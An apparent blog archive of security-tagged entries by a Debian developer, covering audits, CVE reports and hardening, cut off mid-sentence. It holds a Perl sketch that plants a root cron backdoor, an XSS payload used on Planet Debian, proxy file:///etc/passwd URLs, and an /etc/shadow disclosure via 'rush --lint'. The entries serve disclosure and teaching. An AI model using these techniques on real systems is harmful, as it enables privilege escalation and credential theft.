
 

Entries tagged security

Oh, didn't I, didn't I, didn't I see you cryin'?

8 October 2007 21:50

Curse you Debian! Your programs are too secure...

So I was looking over some setgid binaries last night, seeing if there were any obvious security bugs.

Up popped omega-rpg - a fun game I've recently been playing. Unfortunately it is mostly OK:

  • The insecure support for save-game-compression is disabled for Debian.
  • The use of environment variables is safe.
  • The use of low-memory detection is disabled on non-MSDOS systems.
  • The console-based input doesn't succumb to badness if you resize your terminal to allow >80 character input.

The only thing that I can do is persuade the game to die with a SIGSEGV if I manually edit a save-game file, then load it. I'm sure with care and patience it could be coerced into running shellcode.

In theory this is a security hole. In practice it is hard to take seriously!

On the other hand I'm not convinced the game should be setgid(games)..

| No comments

 

It's been seven hours and fifteen days

26 October 2007 21:50

I made a new release of the Chronicle blog compiler the other day, which seems to be getting a surprising number of downloads from my apt repository.

The apt repository will be updated shortly to drop support for Sarge, since in practice I've not uploaded new things there for a while.

In other news I made some new code for the Debian Administration website! The site now has the notion of a "read-only" state. This state forbids new articles from being posted, new votes being cast, and new comments being posted.

The read-only state is mostly designed for emergencies, and for admin work upon the host system (such as when I'm tweaking the newly installed search engine).

In more coding news I've been updating the xen-shell a little recently, so it will shortly have the ability to checksum the filesystems of Xen guests - and later validate them. This isn't a great security feature because it assumes you trust dom0 - and, more importantly, to checksum files your guest must be shut down.

However as a small feature I believe the suggestion was an interesting one.

Finally I've been thinking about system exploitation via temporary file abuse. There are a couple of cases that are common:

  • Creation of an arbitrary (writeable) file upon a host.
  • Creation of an arbitrary (non-writable) file upon a host.
  • Truncation of an existing file upon a host.

Exploiting the first to go from user to root access is trivial. But how would you exploit the last two?
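
To show why the first case is so easy, here is a hypothetical Perl sketch of the usual route - /usr/bin/vulnerable stands in for whichever buggy tool can be tricked into creating the file, and cron is picked only because it is the classic target; the open question is really about the other two cases:

#!/usr/bin/perl
# Hypothetical sketch only: abuse a (made-up) tool which creates an
# attacker-writable file at a path of our choosing, then drop a cron
# job into /etc/cron.d to get code running as root.
use strict;
use warnings;

my $target = "/etc/cron.d/backdoor";

# Step 1: persuade the buggy, privileged, tool to create $target
# owned by root but writable by us.
system( "/usr/bin/vulnerable", "--output", $target ) == 0
  or die "the vulnerable helper didn't co-operate\n";

# Step 2: it is now just a file we can write to.
open my $fh, ">", $target or die "cannot write $target: $!";
print $fh "* * * * * root cp /bin/sh /tmp/rootshell && chmod 4755 /tmp/rootshell\n";
close $fh;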

Denial of Service attacks are trivial via the creation/truncation of /etc/nologin, /etc/shadow, or even /boot/grub/menu.lst! But gaining privileges? I can't quite see how.

Comments welcome!

| No comments

 

It brings on many changes, and I can take or leave it as I please

15 November 2007 21:50

On Tuesday I released a new version of rinse which now supports Fedora Core 8.

On Wednesday I rebuilt xen-unstable several times, and reported a vaguely security relevant issue against the Exaile music player. I flagged that as important, but I'm not really sure how important it should be. True it works. True it requires DNS takeover, or similar, to become a practical attack, but .. serious or not?

Today I'm wondering about "hiding" messages in debian/changelog files. Each changelog entry includes the time & date of the new revision. I tend to pick the last two digits of the timestamp pretty much at random (i.e. the hours and minutes are always correct, but the seconds are a random value).

Given two digits which may be manipulated in the range 0-59 I'm sure a few small messages could be inserted into a package. But the effort would be high. (Hmmm timezone offset too?)
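
As a toy illustration of how little bandwidth that gives you, here is a sketch which maps a short lowercase message onto a series of seconds values, one per upload (purely hypothetical - nobody should actually do this):

#!/usr/bin/perl
# Encode one letter per changelog entry in the "seconds" field of the
# timestamp, mapping a-z onto 00-25 (comfortably inside 0-59).
use strict;
use warnings;

my $message = lc( shift @ARGV // "hello" );

for my $char ( grep { /[a-z]/ } split //, $message ) {
    my $seconds = ord($char) - ord('a');
    printf "next upload: use a timestamp ending :%02d\n", $seconds;
}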

And that concludes today's entry.

| No comments

 

Adopt a less marital tone.

13 April 2008 21:50

If you upload a new package to the Debian archive which contains a setuid or setgid binary please please ask for a security audit, or carry out one yourself.

I certainly accept that the security audit project webpages are not terribly current, and the mailing list is essentially dead, but there are people, such as myself, who would gladly look at your package. All you have to do is ask.

When I see two packages in testing with trivially obvious security bugs it just makes me wonder why we bother.

I'm going to take this chance to restate my hardline position on package maintenance - even though it might not be directly applicable - if you cannot program/debug/handle the language a package is developed in you shouldn't maintain it.

Too often I've seen signs of this; somebody maintaining a C-based program but unable to program in C. Why?

I wonder if we could have a policy / guideline that any new setuid/setgid application must have at least two maintainers, or a documented audit prior to acceptance? Hard to manage but I think it would be useful even if it didn't catch everything. Some bugs such as #475747 (lovely number!) are trivial to discover.

ObQuote: Dangerous Liaisons

| No comments

 

I still don't know why I'm here

14 May 2008 21:50

I wasn't going to comment on the recent openssl security update, because too many people have already done so.

Personally I thought that Aigars Mahinovs made the best writeup I've seen so far.

However I would like to say that having 20+ people all mailing security[at]debian.org to say that the webpage we referenced in the security advisory is currently blank, or to ask for details already released in the advisory they replied to, or to ask for even more details, is not much fun.

Having people immediately start mailing questions like "Huh? What can I do" is only natural, but you can't expect a response when things are as hectic as they have been recently. Ideally people would sit on their hands and bite their tongues. Realistically that isn't going to happen, and realistically this post will make no difference either...

Had the issue not leaked to unstable so quickly (and inappropriately IMHO) then we'd have had a little more time. But once an issue is reported you need to coordinate with other distributions, and so on. Handling something as severe as this is not fun, and random mails from users are a distraction, and a resource-hog.

I should say I was not in any way involved in the discovery, the reporting, the preparation of the fix(es), or the releasing of the update. I knew it was coming, but everybody else seemed to have it well in hand. When there are mails going back and forth for 5+ days with ever-growing Cc: lists, and mailing lists being involved I figure one more cook wouldn't be useful.

So in conclusion:

a. Bad hole.

b. Fixing this will take years, probably.

c. 50+ mails to the security team within an hour of the advisory going public complaining of missing information is not helpful, not useful, and quite irritating. (Albeit understandable).

d. People who don't know the details of an attack, or issue, shouldn't speculate and spread panic, fear, and confusion. Especially when details are a little vague.

e. I still like pies.

Once again thanks to everybody who was involved and put in an insane amount of work. Yes this is only the start - our users have to suffer the pain of regenerating everything - but we did good.

Really. Debian did good.

It might not look like it right now, but it could have been so much worse, and Debian did do good.

ObQuote: X-Men: The Last Stand

| 7 comments

 

Well, are you sure you're using that thing correctly?

31 October 2008 21:50

In response to the comments left on my previous entry about executable configuration files I've changed the way that tscreen works.

There is still support for using an arbitrary shell script or binary as a configuration file, but you must be explicit to enable it:

#
#  Load the dynamic section, if it exists.
#
if -x ~/.tscreen.dynamic  'source ~/.tscreen.dynamic|'

The change here is the trailing "|" on the argument to the source command:

source ~/foo/bar

Opens ~/foo/bar and parses the contents. (Assuming it exists.)

source ~/bin/blah|

Executes ~/bin/blah and parses the output. (Assuming it exists)
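
For the curious the behaviour is easy to mimic; this is only a sketch in Perl, not tscreen's real C code, and the "parser" is just a print statement:

#!/usr/bin/perl
# Sketch of the trailing-"|" convention: a plain argument is read as a
# file, an argument ending in "|" is executed and its output parsed.
use strict;
use warnings;

sub load_config {
    my ($source) = @_;
    my $fh;

    if ( $source =~ s/\|\s*$// ) {
        # "source /path/to/script|"  ->  run it, parse its output.
        open( $fh, "-|", $source ) or return;
    }
    else {
        # "source /path/to/file"    ->  merely read the file.
        open( $fh, "<", $source ) or return;
    }

    while ( my $line = <$fh> ) {
        chomp $line;
        print "would parse: $line\n";    # stand-in for the real parser
    }
    close($fh);
}

load_config("$ENV{HOME}/.tscreen.dynamic|");

If the convention looks familiar it is because Perl's old two-argument open treats a trailing "|" in exactly the same way.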

I still see no security risk with the previous setup, but I'm happy to apply a little misdirection if that makes people feel better.

ObFilm: Ghostbusters

| 4 comments

 

Have you been following that man?

27 November 2008 21:50

meta-hacking

I've had a lot of fun over the past few years detecting and fixing XSS attacks - a few months ago compromising several thousand user-accounts belonging to a particular niche social networking site and then more recently experimenting with XSS issues upon a popular software developer's advocate blog.

One thing I've been wondering about recently is meta-XSS attacks.

Consider the LKML (linux kernel mailing list). This list receives lots of long patches, submitted by email, which are copied verbatim to various archive and news sites. For example if I mailed an interesting patch to LKML chances are it would get posted to several of them.

(Obviously the challenge here is to make a patch sufficiently interesting that it received more than usual coverage.)

Does each of those sites HTML-encode patches? In general they do; certainly the ones I looked at rendered the code like this:

#include <linux.h>
...
...

But I'm certain that not all sites do so. I'm also pretty sure there are interesting avenues to explore here, and the general idea of indirectly attacking a specific target is ripe for exploration.

Anyway I'm probably not the person to go playing in the field these days; I don't have the time. But it is certainly interesting to think about.

ObFilm: Dirty Harry

| No comments

 

I may have kept you chained up in that room but it was for your own good.

21 March 2009 21:50

Last week I resigned from my position as member of the Debian Security Team.

Historically several Debian teams have had members inactive for months and years at a time, and I'd rather leave of my own volition than end up listed but inactive like that.

It's been a pleasure working with all members of the team, past and current (especially Joey), and who knows I might return in the future.

If you're interested in security work then getting involved isn't difficult. It just takes time, patience, and practice.

ObFilm: The Goonies

| No comments

 

I'm gonna forget this conversation ever took place.

24 June 2009 21:50

Recently I mentioned I'd been hacking about with a simple IMAP server.

Yesterday I was working on it some more, because the message store I've been testing against contains about 8 million messages and the damn thing is too slow.

During the course of some tweaking I discovered something interesting: every time a specific IMAP client connected to my server it crashed...

I spent a while fiddling around with backtraces and suchlike; the upshot is I'm still not sure where the client crashes, but I've mailed some details to a few people to see if we can get it narrowed down.

I guess this counts as an accidental security issue. I wonder if I'll be able to collect a bounty? (Not that I'm bitter about past bounty-worthy reports being ignored ;)

Anyway interesting times, when I least expected them.

Mostly this post is being made to test a new release of the chronicle blog compiler - which now allows gravatars and has improved display of comments, as demonstrated here.

ObFilm: Rambo First Blood Part II

| 1 comment

 

Nobody touches the second shelf but me.

27 June 2009 21:50

It seems the IMAP client crash I accidentally discovered in Thunderbird/Icedove was already known.

My report is a duplicate of a bug which was previously reported in 2007. Oops.

ObFilm: The Lost Boys

| 2 comments

 

Hack the planet!

22 September 2009 21:50

Recently I was viewing Planet Debian and there was an entry present which was horribly mangled - although the original post seemed to be fine.

It seemed obvious to me that some of the filtering which the planet software had applied to the original entry had caused it to become broken, malformed, or otherwise corrupted. That made me wonder what attacks could be performed against the planet aggregator software used on Planet Debian.

Originally Planet Debian was produced using the planet software.

This was later replaced with the actively developed planet-venus software instead.

(The planet package has now been removed from Debian unstable.)

Planet, and the Venus project which forked from it, do a great job at scrutinising their input and removing malicious content. So my only hope was to stumble across something they had missed. Eventually I discovered the (different) filtering applied by the two feed aggregators missed the same malicious input - an image with a src parameter including javascript like this:

<img src="javascript:alert(1)">

When that markup is viewed by some browsers it will result in the execution of javascript. In short it is a valid XSS attack which the aggregating software didn't remove, protect against, or filter correctly.

In fairness it seems most of the browsers I tested didn't actually alert when viewing that code - but as a notable exception Opera does.

I placed a demo online to test different browsers.

If your browser executes the code there, and it isn't Opera, then please do let me know!

The XSS testing of planets

Rather than produce a lot of malicious input feeds I constructed and verified my attack entirely off line.

How? Well the planet distribution includes a small test suite, which saved me a great deal of time, and later allowed me to verify my fix. Test suites are good things.

The testing framework allows you to run tiny snippets of code such as this:

# ensure onblur is removed:
HTML( "<img src=\"foo.png\" onblur=\"alert(1);\" />",
      "<img src=\"foo.png\" />" );

Here we give two parameters to the HTML function, one of which is the input string, and the other is the expected output string - if the sanitization doesn't produce the string given as the expected result an error is raised. (The test above is clearly designed to ensure that the onblur attribute and its value is removed.)

This was how I verified initially that the SRC attribute wasn't checked for malicious content and removed as I expected it to be.
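
The missing check boils down to a scheme whitelist on URI-valued attributes. Here's a rough sketch of that sort of test in Perl - not the actual fix which went into the (Python) aggregators:

use strict;
use warnings;

# Return true if a src/href value is safe to keep, false otherwise.
sub safe_uri {
    my ($value) = @_;

    # Browsers ignore control characters and leading whitespace, so
    # strip them before looking for a scheme.
    $value =~ s/[\x00-\x1f]+//g;
    $value =~ s/^\s+//;

    # Relative URIs carry no scheme and are harmless here.
    return 1 unless $value =~ m{^([a-z][a-z0-9+.-]*):}i;

    # Otherwise only allow a small whitelist of schemes.
    my $scheme = lc $1;
    return scalar grep { $scheme eq $_ } qw(http https ftp mailto);
}

print safe_uri("javascript:alert(1)")      ? "keep\n" : "strip\n";   # strip
print safe_uri("http://example.com/x.png") ? "keep\n" : "strip\n";   # keep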

Later I verified this by editing my blog's RSS feed to include a malicious, but harmless, extra section. This was then shown upon the Planet Debian output site for about 12 hours.

During the twelve hour window in which the exploit was "live" I received numerous hits. Here's a couple of log entries (IP + referer + user-agent):

xx.xx.106.146 "http://planet.debian.org/" "Opera/9.80
xx.xx.74.192  "http://planet.debian.org/" "Opera/9.80
xx.xx.82.143  "http://planet.debian.org/" "Opera/9.80
xx.xx.64.150  "http://planet.debian.org/" "Opera/9.80
xx.xx.20.18   "http://planet.debian.net/" "Opera/9.63
xx.xx.42.61   "-"                         "gnome-vfs/2.16.3
..

The Opera hits were to be expected from my previous browser testing, but I'm still not sure why hits came from User-Agents identifying themselves as gnome-vfs/n.n.n. Enlightenment would be rewarding.

In conclusion the incomplete escaping of input by Planet/Venus was allocated the identifier CVE-2009-2937, and will be fixed by a point release.

There are a lot of planets out there - even I have one: Pluto - so we'll hope Opera is a rare exception.

(Pluto isn't a planet? I guess that's why I call my planet a special planet ;)

ObFilm: Hackers.

| 6 comments

 

jQuery in use upon this blog

30 August 2010 21:50

Blog Update

I've just updated the home-grown javascript I was using upon this blog to be jQuery powered.

This post is a test.

I'll need to check but I believe I'm almost 100% jQuery-powered now.

AJAX Proxies

It is a well-known fact that AJAX requests are only allowed to be made to the server the javascript was loaded from - the so-called same-origin security restriction.

To pull content from other sites users are often encouraged to write a simple proxy:

  • http://example.com/ serves Javascript & HTML.
  • http://example.com/proxy/http://example.com allows arbitrary fetching.

Simples? No. Too many people write simple proxies which use PHP's curl function, or something similar, with little restriction on either the protocol or the destination of the requested resource.

Consider the following requests:

  • http://example.com/proxy.php?url=/etc/passwd
  • http://example.com/proxy.php?url=file:///etc/passwd

If you're using some form of Javascript/AJAX proxy make sure you test for this. (ObRandom: Searching google for inurl:"proxy.php?url=http:" shows this is a real problem. l33t.)
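
The check a proxy endpoint needs before fetching anything is small; here is a sketch using the Perl URI module, which insists on an absolute http/https URL with a host and refuses everything else:

#!/usr/bin/perl
# Reject anything which isn't an absolute http/https URL with a host:
# plain paths, file:// URLs, and other schemes all fail the test.
use strict;
use warnings;
use URI;

sub allowed_url {
    my ($raw) = @_;
    my $uri    = URI->new($raw);
    my $scheme = $uri->scheme || '';

    return 0 unless $scheme eq 'http' || $scheme eq 'https';
    return 0 unless length( $uri->host || '' );
    return 1;
}

for my $candidate ( '/etc/passwd', 'file:///etc/passwd', 'http://example.com/' ) {
    printf "%-25s %s\n", $candidate, allowed_url($candidate) ? "fetch" : "reject";
}

Restricting the scheme doesn't stop the proxy being pointed at internal-only hosts, but it does close the file:// class of problem shown above.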

ObQuote: "You're asking me out? That's so cute! What's your name again? " - 10 things I hate about you.

| No comments

 

The remote root hole in exim4 is painful

12 December 2010 21:50

Recently I noticed a report of an alleged remote root security compromise of a machine, via the exim mailserver.

At the time I wasn't sure how seriously to take it, but I followed updates on the thread and it soon became clear that we had a major problem on our hands.

It later became obvious that there were two problems:

CVE-2010-4344

A remote buffer overflow, allowing the execution of arbitrary code as the user Debian-exim.

CVE-2010-4345

A privilege escalation allowing the attacker to jump from running code as Debian-exim to running code as root.

Trivial exploits are floating around the internet - and we were seeing this bug being exploited in the wild as early as yesterday afternoon.

Although I can feel somewhat smug that my own personal server is running qpsmtpd ahead of exim it's still a wake-up call, and this hole has the potential to significantly expand available botnets - it is probably only a matter of days, if not hours, until we see worms taking advantage of the flaw.

ObPlug: I've put together an updated version of exim4 for etch - if you're still running etch then you don't have any official security support (timely upgrading is obviously preferred) and it might be useful to have more folk pointed at that..

ObQuote: "We're all going to die down here" - Resident Evil.

| 7 comments

 

Why I lose interest in some projects.

18 February 2011 21:50

Some projects have historically sucked; they've been incomplete, they've been hard to use, they've had poor documentation, or they've had regular security issues.

Over time projects that started off a little poorly can, and often do, improve. But their reputation is usually a long time in improving.

For me? Personally? PHPMyAdmin is a security nightmare. So while it is nice to read about it gaining the ability to be themed, and even receiving submissions from users (a rare thing - few projects receive such external contributions) I just find it hard to care.

I see PHPMyAdmin mentioned in a blog, in a news article, or on a user's machine and I just think:

  • "PHPMyAdmin? That's that thing that has security problems."

Harsh. Unfair. Possibly no longer true. But I do tend to stick to such judgements, and I'm sure I'm not alone.

Ideally people wouldn't be dogmatic, and would be open-minded about re-evaluating situations. In practice I'm probably not such a unique little snowflake, and there are probably a great many people to this day who maintain views that are based more on historical situations than on the current-day reality:

  • Java is slow and verbose.
  • Perl is line-noise.
  • Sendmail is an insecure mess.
  • ...

Anyway. PHPMyAdmin? I'm sorry for singling you out, even with your fancy themes, language translations, and other modern updates. It's just a name that conjures daemons for me. Though I'm sure there are a great number of people who love it to pieces.

ObQuote: "You don't want to know my name. I don't want to know your name. " - Spartacus

| 7 comments

 

So I chose fabric and reported a bug..

6 June 2011 21:50

When soliciting opinions recently I discovered that the python-based fabric tool was not dead, and was in fact perfect for my needs.

During the process of getting acquainted with it I looked over the source code; it was mostly neat, but there was a trivial (low-risk) symlink attack present.

I reported that as #629003 & it is now identified more globally as CVE-2011-2185.

I guess this goes to show that getting into the habit of looking over source code when you install a new package is a worthwhile thing to do; and probably easier than organising a distribution-wide security audit </irony>.

In other news I'm struggling to diagnose a perl segfault, when running a search using the swish-e perl modules. Could it be security worthy? Possibly. Right now I just don't want my scripts to die when I attempt to search 20Gb of syslog data. Meh.

ObQuote: "You're scared of mice and spiders, but oh-so-much greater is your fear that one day the two species will cross-breed to form an all-powerful race of mice-spiders who will immobilize human beings in giant webs in order to steal cheese. " - Spaced.

| No comments

 

Some misc. updates

13 January 2012 21:50

Security

Today I made available a 3.2.0 kernel for my KVM guest which has a bastardised version of the PID hiding patch configured.

So now on my guest, as myself, I can only see this:

steve@steve:~$ ls -l /proc/ | egrep ' [0-9]+$'
dr-xr-xr-x  7 steve users          0 Jan 13 17:22 15150
dr-xr-xr-x  7 steve users          0 Jan 13 17:29 15739
dr-xr-xr-x  7 steve users          0 Jan 13 17:29 15740
lrwxrwxrwx  1 root  root          64 Jan 13 17:20 self -> 15739

Running as root I see the full tree:

steve:~#  ls -l /proc/ | egrep ' [0-9]+$'
total 0
dr-xr-xr-x  7 root        root                 0 Jan 13 17:20 1
dr-xr-xr-x  7 root        root                 0 Jan 13 17:20 1052
dr-xr-xr-x  7 root        root                 0 Jan 13 17:20 1086
dr-xr-xr-x  7 root        root                 0 Jan 13 17:20 1101
dr-xr-xr-x  7 root        root                 0 Jan 13 17:20 1104
dr-xr-xr-x  7 root        root                 0 Jan 13 17:21 1331
dr-xr-xr-x  7 pdnsd       proxy                0 Jan 13 17:21 14409
dr-xr-xr-x  7 root        root                 0 Jan 13 17:21 14519
..

This (obviously) affects output from top etc too. It is a neat feature which I think is worth having, but time will tell..

mod_ifier

A long time ago I put together an Apache module which allowed the evaluation of security rules against incoming HTTP requests. mod_ifier was largely ignored by the world. But this week it did receive a little attention.

The recent rash of Hash Collision attacks inspired a fork with parameter filtering. Neat.

Otherwise nothing too much to report - though I guess I didn't actually share the link to the RESTful file store I mentioned previously. Should you care you can find it here.

ObQuote: "I saw a man, he danced with his wife" - Chicago, Frank Sinatra

| 2 comments

 

Misc update.

8 July 2012 21:50

I got a few emails about the status panel I'd both toyed with and posted. The end result is that the live load graphs now have documentation, look prettier, and contain a link to the source code.

Apart from that this week has mostly involved photographing cute cats, hairy dogs, and women in corsets.

In Debian-related news the njam bug "Insecure usage of environmental variable" was closed after about 7 months, and I reported a failure of omega-rpg to drop group(games) privileges prior to saving game-state. That leads to things like this:

skx@precious:~$ ls -l | grep games
-rw-r--r--   1 skx games   14506 Jul  8 15:20 Omega1000

Not the end of the world, but it does mean you can write to directories owned by root:games, and potentially overwrite level/high-score files in other packages, leading to compromises.

ObQuote: "Your suffering will be legendary, even in hell! " - Hellraiser II (Did you know there were eight HellRaiser sequels?)

| No comments

 

A good week?

29 December 2013 21:50

This week my small collection of sysadmin tools received a lot of attention; I've no idea what triggered it, but it ended up on the front-page of github as a "trending repository".

Otherwise I've recently spent some time "playing about" with some security stuff. My first recent report wasn't deemed worthy of a security update, but it was still a fun one. The package description of rush says:

GNU Rush is a restricted shell designed for sites providing only limited access to resources for remote users. The main binary executable is configurable as a user login shell, intended for users that only are allowed remote login to the system at hand.

As the description says this is primarily intended for use by remote users, but if it is installed locally you can read "any file" on the local system.

How? Well the program is setuid(root) and allows you to specify an arbitrary configuration file as input. The very very first thing I tried to do with this program was feed it an invalid and unreadable-to-me configuration file.

Helpfully there is a debugging option, --lint, to help you set up the software. Using it is as simple as:

shelob ~ $ rush --lint /etc/shadow
rush: Info: /etc/shadow:1: unknown statement: root:$6$zwJQWKVo$ofoV2xwfsff...Mxo/:15884:0:99999:7:::
rush: Info: /etc/shadow:2: unknown statement: daemon:*:15884:0:99999:7:::
rush: Info: /etc/shadow:3: unknown statement: bin:*:15884:0:99999:7:::
rush: Info: /etc/shadow:4: unknown statement: sys:*:15884:0:99999:7:::
..

How nice?

The only mitigating factor here is that only the first token on the line is reported - in this case we've exposed /etc/shadow, which doesn't contain whitespace for the interesting users, so it's enough to start cracking those password hashes.
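
The general defence for a setuid tool which accepts a user-supplied path is to shed the extra privileges before opening it. A minimal sketch of the pattern in Perl (rush itself is C, so this is the idea rather than the fix):

#!/usr/bin/perl
# Drop effective group and user back to the real IDs before touching
# any path the invoking user handed us.
use strict;
use warnings;

my $config = shift @ARGV or die "usage: $0 config-file\n";

my $real_gid = 0 + $(;            # numeric context: just the first gid
$) = "$real_gid $real_gid";       # drop effective + supplementary groups
$> = $<;                          # drop the effective user

die "failed to drop privileges\n"
  unless $> == $< && ( 0 + $) ) == $real_gid;

open my $fh, '<', $config or die "cannot read $config: $!\n";
print while <$fh>;
close $fh;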

If you maintain a setuid binary you must be trying things like this.

If you maintain a setuid binary you must be confident in the codebase.

People will be happy to stress-test, audit, examine, and help you - just ask.

Simple security issues like this are frankly embarrassing.

Anyway that's enough: #733505 / CVE-2013-6889.

| No comments

 

Time to mix things up again

20 March 2014 21:50

I'm currently a contractor, working for/with Dyn, until April the 11th.

I need to decide what I'm doing next, if anything. In the meantime here are some diversions:

Some trivial security issues

I noticed and reported two more temporary-file issues: insecure temporary file usage in apt-extracttemplates (apt), and insecure use of temporary files in libreadline6's _rl_trace.

Neither of those is particularly serious, but looking for them took a little time. I recently started re-auditing code, and decided to do the following:

  • Download the source code to every package installed upon this system.
  • Download the source code to all packages matching the pattern ^libpam-, and ^libruby-*.

I've not yet finished slogging through the code, but I expect to find a few more issues. I'll guess 5-10, given my cynical nature.

NFS-work

I've been tasked with the job of setting up a small cluster running from a shared and writeable NFS-root.

This is a fun project which I've done before: PXE-booting a machine and telling it to mount a root filesystem over NFS is pretty straightforward. The hard part is making that system writeable, such that you can boot and run "apt-get install XX". I've done it in the past using magic filesystems, or tmpfs. Either will work here, so I'm not going to dwell on it.

Another year

I had another birthday, so that was nice.

My wife took me to a water-park where we swam like fisheseses, and that tied in nicely with a recent visit to Deep Sea World, where we got to walk through a glass tunnel, beneath a pool FULL OF SHARKS, and other beasties.

Beyond that I received another Global Knife, which has now been bloodied, since I managed to slice my finger open chopping mushrooms on Friday. Oops. Currently I'm in that annoying state where I'm slowly getting used to typing with a plaster around the tip of my finger, but knowing that it'll have to come off again and I'll get confused again.

Linux Distribution

I absolutely did not start working on a "linux distribution", because that would be crazy. Do I look like a crazy-person?

All I did was play around with GNU Stow, and ponder the idea of using a minimal LibC and GNU Stow to organize things.

It went well, but the devil is always in the details.

I like the idea of a master-distribution which installs pam, ssh, etc, but then has derivatives for "This is a webserver", "This is a Ruby server", and "This is a database server".

Consider it like task-selection, but with higher ambition.

There's probably more I could say; a new kitchen sink (literally) and a new tap have made our kitchen nicer, I've made it past six months of regular gym-based workouts, and I didn't die when I went to the beach in the dark the other night, so that was nice.

Umm? Stuff?

Have a nice day. Thanks.

| 2 comments

 

New GPG-key

24 March 2014 21:50

I've now generated a new GPG-key for myself:

$ gpg --fingerprint 229A4066
pub   4096R/0C626242 2014-03-24
      Key fingerprint = D516 C42B 1D0E 3F85 4CAB  9723 1909 D408 0C62 6242
uid                  Steve Kemp (Edinburgh, Scotland) <steve@steve.org.uk>
sub   4096R/229A4066 2014-03-24

The key can be found online via mit.edu : 0x1909D4080C626242

This has been signed with my old key:

pub   1024D/CD4C0D9D 2002-05-29
      Key fingerprint = DB1F F3FB 1D08 FC01 ED22  2243 C0CF C6B3 CD4C 0D9D
uid                  Steve Kemp <steve@steve.org.uk>
sub   2048g/AC995563 2002-05-29

If there is anybody who has signed my old key who wishes to sign my new one then please feel free to get in touch to arrange it.

| No comments

 

I've not commented on security for a while

22 April 2014 21:50

Unless you've been living under a rock, or in a tent (which would make me slightly jealous) you'll have heard about the recent heartbleed attack many times by now.

The upshot of that attack is that lots of noise was made about hardening things, and there is now a new fork of openssl being developed. Many people have commented about "hardening Debian" in particular, as well as random musing on hardening software. One or two brave souls have even made noises about auditing code.

Once upon a time I tried to setup a project to audit Debian software. You can still see the Debian Security Audit Project webpages if you look hard enough for them.

What did I learn? There are tons of easy security bugs, but finding the hard ones is hard.

(If you get bored some time just pick your favourite Editor, which will be emacs, and look at how /tmp is abused during the build-process or in random libraries such as tramp (tramp-uudecode).)

These days I still poke at source code, and I still report bugs, but my enthusiasm has waned considerably. I tend to only commit to auditing a package if it is a new one I install in production, which limits my efforts considerably, but makes me feel like I'm not taking steps into the dark. It looks like I reported only three security issues this year, and before that you have to go back to 2011 to find something I bothered to document.

What would I do if I had copious free time? I wouldn't audit code. Instead I'd write test-cases for code.

Many many large projects have rudimentary test-cases at best, and zero coverage at worst. I appreciate writing test-cases is hard, because lots of times it is hard to test things "for real". For example I once wrote a filesystem, using FUSE, which had some built-in unit-tests (I was pretty pleased with that: you could launch the filesystem with a --test argument and it would invoke the unit-tests on itself. No separate steps, or source code, required. If it was installed you could use it, and you could test it in-situ). Beyond that I also put together a simple filesystem-stress script, which read/wrote/found random files, computed MD5 hashes of their contents, etc. I've since seen similar random-filesystem-stresstest projects, and if they had existed then I'd have used them. Testing filesystems is hard.
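
For the curious, the stress script amounted to little more than the following sketch (this is a reconstruction, not the original):

#!/usr/bin/perl
# Write files full of random data, remember their MD5 sums, then
# re-read every one of them and verify the contents survived.
use strict;
use warnings;
use Digest::MD5 qw(md5_hex);
use File::Path qw(make_path);

my $root = shift @ARGV or die "usage: $0 directory-on-the-filesystem-under-test\n";
make_path($root);

my %expected;
for my $i ( 1 .. 100 ) {
    my $data = join '', map { chr int rand 256 } 1 .. ( 1 + int rand 65536 );
    my $file = "$root/file-$i";
    open my $fh, '>:raw', $file or die "write $file: $!";
    print {$fh} $data;
    close $fh or die "close $file: $!";
    $expected{$file} = md5_hex($data);
}

for my $file ( sort keys %expected ) {
    open my $fh, '<:raw', $file or die "read $file: $!";
    my $got = md5_hex( do { local $/; <$fh> } );
    close $fh;
    print "FAIL: $file\n" unless $got eq $expected{$file};
}
print "checked ", scalar keys %expected, " files\n";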

I've written kernel modules that have only a single implicit test case: It compiles. (OK that's harsh, I'd usually ensure the kernel didn't die when they were inserted, and that a new node in /dev appeared ;)

I've written a mail client, and beyond some trivial test-cases to prove my MIME-handling wasn't horrifically bad there are zero tests. How do you simulate all the mail that people will get, and the funky things they'll do with it?

But that said I'd suggest if you're keen, if you're eager, if you want internet-points, writing test-cases/test-harnesses would be more useful than randomly auditing source code.

Still what would I know, I don't even have a beard..

| 1 comment

 

Some brief updates

8 May 2014 21:50

Some brief notes, between tourist-moments.

Temporary file races

I reported some issues against the lisp that is bundled with GNU Emacs, the only one of any significance related to the fall-back uudecode option supported by tramp.el.

(tramp allows you to edit files remotely, it is awesome.)

Inadvertently I seem to have received a CVE identifier referring to the Mosaic web-browser. Damn. That's an old name now.

Image tagging

A while back I wrote about options for tagging/finding images in large collections.

Taking a step back I realized that I mostly file images in useful hierarchies:

Images/People/2014/
Images/People/2014/01/
Images/People/2014/01/03-Heidi/{ RAW JPG thumbs }
Images/People/2014/01/13-Hanna/{ RAW JPG thumbs }
..

On that basis I just dropped a .meta file in each directory with brief notes. e.g:

name     = Jasmine XXX
location = Leith, Edinburgh
source   = modelmayhem
theme    = umbrella, rain, water
contact  = 0774xxxxxxx

Then I wrote a trivial perl script to find *.meta - allowing me to create IMAGE_123.CR2.meta too - and the job was done.
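
The script really is trivial; something like this sketch (not the original, and the directory argument is whatever the top of your image tree is):

#!/usr/bin/perl
# Walk a tree, parse the "key = value" lines in every *.meta file, and
# print the directories whose metadata matches the search term.
use strict;
use warnings;
use File::Find;

my ( $term, $dir ) = @ARGV;
die "usage: $0 search-term directory\n" unless defined $term && defined $dir;

find(
    sub {
        return unless /\.meta$/;
        open my $fh, '<', $_ or return;
        my %meta;
        while ( my $line = <$fh> ) {
            $meta{$1} = $2 if $line =~ /^\s*(\S+)\s*=\s*(.+?)\s*$/;
        }
        close $fh;
        print "$File::Find::dir\n" if grep { /\Q$term\E/i } values %meta;
    },
    $dir
);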

Graphical Applications

I'm currently gluing parts of Gtk + Lua together, which is an experiment to see how hard it is to create a flexible GUI mail client. (yeah.)

So far it's easy if I restrict the view to three panes, but I'm wondering if I can defer that, and allow the user to handle the layout 100%. I suspect "not easily".

We'll see, since I'm not 100% sold on the idea of a GUI mail client in the first place. Still it is a diversion.

Finland

I actually find myself looking forward to my next visit which is .. interesting?

| No comments

 

Sometimes reading code makes you scream.

30 May 2014 21:50

So I've recently been looking at proxy-server source code, for obvious reasons. The starting point was a simple search of the available options:

~$ apt-cache search proxy filter
...
trafficserver - fast, scalable and extensible HTTP/1.1 compliant caching proxy server
ssh-agent-filter - filtering proxy for ssh-agent

Hrm? trafficserver? That sounds like fun. Let's look at the source.

cd /tmp
apt-get source trafficserver

Lots of code, but scanning it quickly with my favourite tool, grep, we find this "gem":

$ rgrep /tmp .
